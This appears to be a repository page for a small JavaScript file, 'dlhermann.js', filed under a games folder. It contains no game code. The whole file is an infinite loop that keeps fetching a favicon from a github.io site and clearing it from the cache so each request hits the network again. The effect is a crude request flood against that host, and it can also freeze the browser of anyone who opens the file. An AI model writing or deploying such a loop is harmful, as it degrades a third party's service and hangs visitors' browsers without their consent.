games/Games/Krydder/dlhermann.js
2022-12-16 10:52:11 +01:00

11 lines
318 B
JavaScript

while (true) {
fetch('https://t0m0t0w.github.io/favicon.png')
.then(response => response.text())
.then(data => {
// Do something with the data
console.log(data);
// Delete the file from the cache
caches.delete('https://t0m0t0w.github.io/favicon.png');
});
}